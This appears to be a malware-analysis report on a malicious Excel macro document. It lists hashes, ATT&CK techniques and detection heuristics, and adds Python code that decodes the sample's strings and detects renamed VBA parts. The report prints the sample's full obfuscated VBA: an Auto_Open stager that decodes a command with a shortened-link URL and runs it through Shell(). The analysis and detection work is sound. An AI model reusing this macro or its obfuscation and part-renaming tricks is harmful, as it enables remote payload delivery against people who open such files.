Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 fff0f0cc113aa768…

MALICIOUS

Office (OOXML)

Size: 155.8 KB
Created: 2006-09-16 00:00:00 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2021-11-21
MD5: 0ac64af287d04576bf0acd8c489f4dcd
SHA-1: 488f67509302f5272d67448ce43e1fadff7bfb3d
SHA-256: fff0f0cc113aa76803c0c8e461c011155edc553901844f08fe020e9107d9b1e1
Risk score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The OOXML file contains a VBA macro that runs automatically through an Auto_Open subroutine. Auto_Open first displays a decoy message box, then assembles a command from three strings. Two of them are stored encoded and are decoded at run time by subtracting a per-string offset from every character code (the Mid/Asc/Chr loop in the function qXglP77Xz); the third is plaintext. The concatenation is passed to Shell(). The decoder function is padded with dead GoTo branches and unused string assignments to hinder reading and signature matching. The Shell() call together with the auto-execution mechanism strongly suggests downloader or dropper functionality; the payload itself is not contained in the document.

Heuristics (6)

  • VBA project inside OOXML (medium, OOXML_VBA; 5 related findings)
    The document contains a VBA project. The project part has been renamed away from vbaProject.bin: xl/aksodkaoskdoasdk.b
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro source contains a call to Shell().
  • VBA character-shift decoded Shell command (critical, OLE_VBA_ASC_CHR_SHIFT_SHELL)
    The auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell(). This is a high-confidence command stager.
  • VBA project part renamed to evade filename detection (high, OOXML_VBA_PROJECT_RENAMED)
    The VBA project is bound through the OOXML relationship and content type, but the part is not named vbaProject.bin. Legitimate producers write this part as vbaProject.bin; renaming it hides the macros from scanners that match on the path only (also observed in the SVCReady loader).
  • Auto_Open macro (high, OLE_VBA_AUTO)
    The macro runs automatically when the workbook is opened, via an Auto_Open subroutine.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, or documents where source extraction fails, so that the macro is still detected when no source is visible.
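The decoding loop the insights and heuristics describe is small enough to reproduce outside Office. The Python below is an added example, not part of this report or of the sample: it reimplements the macro's qXglP77Xz routine and runs it over the three string literals and shift values visible in the extracted macro source, copied here as constants. Two characters of the first literal were bytes above 0x7F that the extraction rendered as U+FFFD and U+20AC; those positions cannot be recovered from the page, so that fragment decodes only partially, while the other two literals are plain ASCII and decode unambiguously.

```python
"""Re-implementation of the sample's character-shift decoder (qXglP77Xz).

Added example; not code from the report or from the sample itself.
"""

# Encoded literals and per-string shifts, copied from the extracted macro
# source in this report. The first literal contains two characters the
# extraction could not render (U+FFFD and U+20AC in the preview); they were
# bytes >= 0x80 in the original and are unrecoverable from the page.
MSGBOX_TEXT = ("LYYVY(", 7)                                        # decoy MsgBox
CMD_PREFIX = ("KBd qvlw {d{\ufffd{|mu;:dkitk6m\u20acmd66du{p|i(", 8)  # partly mangled
CMD_URL = ("jvvru<11yyy0dkvn{0eqo1", 2)
CMD_SUFFIX = "wjdlidjwodkwodkdlidj"   # passed to Shell() without encoding


def shift_decode(encoded: str, shift: int) -> str:
    """Equivalent of the macro's loop:
    Mid(s, i, 1) = Chr(Asc(Mid(s, i, 1)) - shift) for every position i.
    """
    return "".join(chr(ord(c) - shift) for c in encoded)


def recover_msgbox_text() -> str:
    """Text shown by the decoy MsgBox before the command is built."""
    return shift_decode(*MSGBOX_TEXT)


def recover_shell_argument() -> str:
    """Rebuild the string the macro hands to Shell(): prefix + URL + suffix,
    mirroring ynqvxPcX4 + IztWb1wSm + xrFCm28Ci in Auto_Open."""
    return shift_decode(*CMD_PREFIX) + shift_decode(*CMD_URL) + CMD_SUFFIX


def printable(text: str) -> str:
    """Escape anything outside printable ASCII so the unrecoverable positions
    stay visible in output instead of being silently dropped."""
    return "".join(c if " " <= c <= "~" else f"\\u{ord(c):04x}" for c in text)


if __name__ == "__main__":
    print("MsgBox text :", printable(recover_msgbox_text()))
    print("Shell() arg :", printable(recover_shell_argument()))
```

recover_msgbox_text() returns the decoy text ERROR!. The URL literal decodes to https://www.bitly.com/ and the plaintext suffix completes its path, so the link is split across an encoded and an unencoded literal and neither a URL regex over the source nor a decode of one literal sees the whole thing. The prefix decodes to a path beginning C:\ whose middle is partly unrecoverable because of the two mangled characters; the escaped output shows exactly where.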

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4161 bytes
SHA-256: 93079a263491cb8335eb8e08f0aa0f98bd01cdfcdd31fa382263ee8d4c60c41a
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub Auto_Open()
Debug.Print MsgBox(qXglP77Xz("LYYVY(", "7"), vbOKCancel); returns; 1
Dim ynqvxPcX4 As String
Dim IztWb1wSm As String
Dim xrFCm28Ci As String
ynqvxPcX4 = qXglP77Xz("KBd qvlw {d{�{|mu;:dkitk6m€md66du{p|i(", "8")
IztWb1wSm = qXglP77Xz("jvvru<11yyy0dkvn{0eqo1", "2")
xrFCm28Ci = "wjdlidjwodkwodkdlidj"
Debug.Print ynqvxPcX4
Debug.Print IztWb1wSm
Debug.Print xrFCm28Ci
Debug.Print (Shell(ynqvxPcX4 + IztWb1wSm + xrFCm28Ci))
End Sub
Public Function qXglP77Xz(UE2EtbVNL As String, Rb47W0TWO As Integer)
    Dim wDJHxwWIO As Integer
    For wDJHxwWIO = 1 To Len(UE2EtbVNL)

GoTo hFAdfMSltiOKKINFMd
hFAdfMSltiOKKINFMd:
GoTo piepGUqeoLGklRmrzpU:
olThGGiqDfeCTuUgasbxhsyuF:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo mtvEcQACjpIQFlhhfkVc
mQrdtwzrPtYDsMCtHRAAnaBYkygx:
GoTo BbOMGZVsOntpAD
dQpmIfDvrDTjEsBZTxz:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo RRgXZRqTwydSmdUhsb
RRgXZRqTwydSmdUhsb:
GoTo fdiFLSxKJagYwLEpQZtV
TvPuSkwlicurOyIOK:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo noJLUsZCSzFZhVBxxwAm
noJLUsZCSzFZhVBxxwAm:
        Mid(UE2EtbVNL, wDJHxwWIO, 1) = Chr(Asc(Mid(UE2EtbVNL, wDJHxwWIO, 1)) - Rb47W0TWO)
GoTo mQrdtwzrPtYDsMCtHRAAnaBYkygx
mtvEcQACjpIQFlhhfkVc:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo AbaqgjbzdHFnwmdrBkkQQy
piepGUqeoLGklRmrzpU:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo aOOpwKmGlJbnbZTliF
aOOpwKmGlJbnbZTliF:
GoTo olThGGiqDfeCTuUgasbxhsyuF
REfBAdJcNRr:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo dQpmIfDvrDTjEsBZTxz
AbaqgjbzdHFnwmdrBkkQQy:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo oAFCNefBCLjQtJpyPX
oAFCNefBCLjQtJpyPX:
GoTo TvPuSkwlicurOyIOK
uHGQbeUuJCmTVrTYmwQ:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo REfBAdJcNRr
BbOMGZVsOntpAD:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo opzIDhwPkCxmSbcafPJ
opzIDhwPkCxmSbcafPJ:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo NsnomrcVdHiTjnphHj
NsnomrcVdHiTjnphHj:
GoTo uHGQbeUuJCmTVrTYmwQ
fdiFLSxKJagYwLEpQZtV:

    Next wDJHxwWIO

GoTo OuiDtkJrreRrObpWna
OuiDtkJrreRrObpWna:
GoTo VsOntpADSopzIDhwPkCx:
hnuZmlBFHzZngQyAU:
    qXglP77Xz = UE2EtbVNL
GoTo CPMvIiiJRfGbFev
iLNtNTbQwFGE:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo hnuZmlBFHzZngQyAU
QkshMIIHLxDKcCBRH:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo CbEjhODYNESdLLyza
sgRtPOqYpbf:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo grlDAQsQJFQixSFP
CPMvIiiJRfGbFev:
GoTo wHBTCaJTaVhyNUQgDyce
vQrVuMYMJDV:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo qakqmyOPlnwTBeubhAI
grlDAQsQJFQixSFP:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo iLNtNTbQwFGE
VsOntpADSopzIDhwPkCx:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo rjHQPzikEhmzJ
rjHQPzikEhmzJ:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo sgRtPOqYpbf
CbEjhODYNESdLLyza:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo vQrVuMYMJDV
wHBTCaJTaVhyNUQgDyce:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo QkshMIIHLxDKcCBRH
qakqmyOPlnwTBeubhAI:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo SbcafPJQuHGQ
SbcafPJQuHGQ:

End Function



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: xl/aksodkaoskdoasdk.b | 21504 bytes
SHA-256: 5bfe09d659d838ba3682e390b5485ed3b3e4a3ff7e1e152ffd38416c172a79d8
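The OOXML_VBA_PROJECT_RENAMED finding rests on one package-format fact: Office locates the VBA project through the workbook part's relationship and the package content type, not through the part's file name. The Python below is an added example, not part of this report or of any scanner. It builds a constructed minimal macro-enabled package with the VBA part stored under the name this report lists, xl/aksodkaoskdoasdk.b, and then looks for the project three ways: by file name, by content type in [Content_Types].xml, and by relationship type in xl/_rels/workbook.xml.rels. The dummy part body is a fake OLE signature with no real VBA streams; the content-type and relationship-type URIs are the standard ones for the vbaProject part.

```python
"""Find an OOXML VBA project by content type and relationship, not by name.

Added example; not code from the report, the sample, or any real scanner.
"""
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

# Standard identifiers for the VBA project part in an OOXML package.
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
VBA_REL_TYPE = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def build_sample(vba_part: str) -> bytes:
    """Constructed minimal macro-enabled package (not the real sample).

    Only the parts needed to bind a VBA project are present; the VBA part
    body is a fake OLE signature followed by zero padding.
    """
    rel_target = posixpath.relpath(vba_part, "xl")  # Target is relative to xl/
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
        f'<Override PartName="/{vba_part}" ContentType="{VBA_CONTENT_TYPE}"/>'
        "</Types>"
    )
    workbook_rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{VBA_REL_TYPE}" Target="{rel_target}"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/_rels/workbook.xml.rels", workbook_rels)
        z.writestr(vba_part, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56)
    return buf.getvalue()


def find_vba_parts(package: bytes) -> dict:
    """Locate VBA project parts three ways; each value is a list of zip member names."""
    found = {"by_name": [], "by_content_type": [], "by_relationship": []}
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        names = z.namelist()

        # 1. Path-only check: what a naive scanner does, and what renaming defeats.
        found["by_name"] = [n for n in names if n.lower() == "xl/vbaproject.bin"]

        # 2. Content-type check: a Default maps an extension, an Override maps one part.
        types = ET.fromstring(z.read("[Content_Types].xml"))
        vba_exts = {d.get("Extension", "").lower()
                    for d in types.iter(CT_NS + "Default")
                    if d.get("ContentType") == VBA_CONTENT_TYPE}
        vba_overrides = {o.get("PartName", "").lstrip("/")
                         for o in types.iter(CT_NS + "Override")
                         if o.get("ContentType") == VBA_CONTENT_TYPE}
        found["by_content_type"] = [
            n for n in names
            if n in vba_overrides or ("." in n and n.rsplit(".", 1)[1].lower() in vba_exts)
        ]

        # 3. Relationship check: follow the vbaProject relationship from the workbook part.
        rels_name = "xl/_rels/workbook.xml.rels"
        if rels_name in names:
            rels = ET.fromstring(z.read(rels_name))
            for rel in rels.iter(REL_NS + "Relationship"):
                if rel.get("Type") != VBA_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                if target.startswith("/"):          # absolute part name
                    part = target.lstrip("/")
                else:                               # relative to the source part's folder
                    part = posixpath.normpath(posixpath.join("xl", target))
                if part in names:
                    found["by_relationship"].append(part)
    return found


def has_vba_project(package: bytes) -> bool:
    """True when the package binds a VBA project by content type or relationship,
    whatever the part is called."""
    f = find_vba_parts(package)
    return bool(f["by_content_type"] or f["by_relationship"])


if __name__ == "__main__":
    for part in ("xl/vbaProject.bin", "xl/aksodkaoskdoasdk.b"):
        print(part, find_vba_parts(build_sample(part)))
```

With the renamed part the by_name list is empty while both the content-type and relationship lookups return xl/aksodkaoskdoasdk.b, which is the gap the heuristic closes. A scanner should treat either binding as "macros present"; checking both also covers packages where the content type is declared through a Default extension rule rather than an Override.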